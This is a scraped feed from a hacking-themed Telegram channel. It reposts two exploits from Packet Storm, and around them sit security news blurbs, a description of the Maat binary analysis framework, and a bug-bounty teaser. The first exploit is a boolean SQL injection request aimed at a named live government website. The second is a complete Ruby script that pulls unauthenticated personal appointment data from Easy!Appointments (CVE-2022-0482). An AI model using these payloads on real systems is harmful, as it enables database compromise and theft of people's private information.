Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Explore CMS 1.0 SQL Injection

https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
Explore CMS version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | d4f9e56109dda02dd82e311a0e9680e4

Download
# Exploit Title: explore CMS - Boolean Based SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: On Request
# POC
#SQL Injection
SQL injection is a web security vulnerability that allows an attacker
to interfere with the queries that an application makes to its
database.
explore CMS is vulnerable to the SQL Injection in 'id' parameter of
the 'page' page.
#Steps to reproduce

Following URL is vulnerable to SQL Injection in the 'id' field.

GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: www.gdc.gov.bd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: https://www.gdc.gov.bd/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding

10.3.34-MariaDB
Server accepts the payload and the response get delayed by 7 seconds.

#Impact

An attcker can compromise the database of the application by manual
method or by automated tools such as SQLmap.

--
Thanks
Sajibe Kanti

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Easy!Appointments Information Disclosure

https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png
Easy!Appointments versions prior to 1.4.3 suffers from an unauthenticated PII disclosure vulnerability.

MD5 | 8155a1872473245af54963658039235f

Download
#!/usr/bin/env ruby

# Exploit
## Title: Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482
## Date: 2022-04-11
## Vendor Homepage: https://easyappointments.org/
## Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz
## Version: < 1.4.3 (it means up to 1.4.2)
## Tested on: Easy!Appointments Version 1.3.2
## References: https://www.exploit-db.com/exploits/FIXME

# Vulnerability
## Discoverer: Francesco CARLUCCI
## Date: 2022-01-30
## Discoverer website: https://carluc.ci/
## Discovered on OpenNetAdmin 1.4.2
## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments
## CVE: CVE-2022-0482
## CWE: CWE-863
## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c
## References:
## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
## - https://github.com/alextselegidis/easyappointments/tree/1.4.2
## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml
## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482

require 'date'
require 'httpx'
require 'docopt'

doc =
Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure

Source: https://github.com/Acceis/exploit-CVE-2022-0482

Usage:
#{__FILE__} <url[<startdate <enddate] [--debug]
#{__FILE__} -h | --help

Options:
<urlRoot URL (base path) including HTTP scheme, port and root folder
<startdateAll events since (default: 2015-01-11)
<enddateAll events until (default: today)
--debug Display arguments
-h, --help Show this screen

Examples:
#{__FILE__} http://10.0.0.1
#{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30
DOCOPT

def fetch_csrf(root_url, http)
vuln_url = "#{root_url}/index.php"

http.get(vuln_url)
end

def exploit(root_url, startDate, endDate, http)
vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events"

params = {
'csrfToken' => http.cookies.first.value, # csrfCookie
'startDate' => startDate.nil? ? '2015-01-11' : startDate,
'endDate' => endDate.nil? ? Date.today.to_s : endDate
}

http.post(vuln_url, form: params)
end

begin
args = Docopt.docopt(doc)
pp args if args['--debug']

http = HTTPX.plugin(:cookies)
fetch_csrf(args['<url'], http)
puts exploit(args['<url'], args['<startdate'], args['<enddate'], http).body
rescue Docopt::Exit => e
puts e.message
end

Source:packetstormsecurity.com
Dark Reading: Attacks/Breaches
80% of Software Codebases Contain at Least One Vulnerability

Open source code continues its steady takeover of codebases, and organizations have made slight gains in eliminating out-of-date and vulnerable components.
Dark Reading: Attacks/Breaches
How Do I Conduct a Resilience Review?

As the first step, make sure that all business-critical data across your organization is protected.
Maat is an open-source Dynamic Symbolic Execution (https://www.kitploit.com/search/label/Symbolic%20Execution) and Binary Analysis (https://www.kitploit.com/search/label/Binary%20Analysis) framework. It provides various functionalities such as symbolic execution, taint analysis, constraint solving, binary loading, environment simulation, and leverages Ghidra's sleigh library for assembly lifting: https://maat.re (https://maat.re/) Key features: Fast & Portable: Designed to scale to real-world applications. Fully written in C++ for good runtime performance. There are hardly any runtime dependencies, and most of them are optional User-friendly: Maat has a flexible debugger-like API, and its features are configurable to adapt to many different use-cases. As any self-respecting modern framework, it comes with Python bindings Multi-arch: With lifting and emulation (https://www.kitploit.com/search/label/Emulation) based on Ghidra's awesome sleigh library, Maat has the potential to emulate many architectures, including exotic ones
Installation To install Maat's python module: python3 -m pip install pymaat
To install Maat's native SDK and use the C++ API, check out BUILDING.md (https://github.com/trailofbits/maat/blob/master/BUILDING.md) Example from maat import *

# Create a symbolic engine for Linux X86-32bits
engine = MaatEngine(ARCH.X86, OS.LINUX)

# Load a binary with one command line argument
engine.load("./some_binary", BIN.ELF32, args=[engine.vars.new_symbolic_buffer("some_arg", 20)])

# Get current eax value
engine.cpu.eax

# Read 4 bytes at the top of the stack
engine.mem.read(engine.cpu.esp, 4)

# Set a callback displaying every memory read
def show_mem_access(engine):
mem_access = engine.info.mem_access
print(f"Instruction at {engine.info.addr} reads {mem_access.size} bytes at {mem_access.addr}")

engine.hooks.add(EVENT.MEM_R, WHEN.BEFORE, callbacks=[show_mem_access])

# Take and restore snapshots
snap = engine.take_snapshot()
engine.restore_snapshot(snap)

# Run the binary
engine.run() Contact For general discussions, questions and suggestions, we use Github Discussions (https://github.com/trailofbits/maat/discussions) For reporting (https://www.kitploit.com/search/label/Reporting) issues and bugs, please use Github Issues (https://github.com/trailofbits/maat/issues) For anything else, drop an e-mail at boyan.milanov@trailofbits.com (mailto:boyan.milanov@trailofbits.com)

Download Maat (https://github.com/trailofbits/maat)
Want to see how i managed to get OTP Bypass without any hacking ? Give it a shot and read my story!Continue reading on Medium » (https://medium.com/@firatistaken/earning-without-any-hacking-most-interesting-otp-bypass-3b71b63dd9f2?source=rss------bug_bounty-5)
Earning $$$ without any hacking, Most interesting OTP Bypass

Want to see how i managed to get OTP Bypass without any hacking ? Give it a shot and read my story!Continue reading on Medium »
Read more...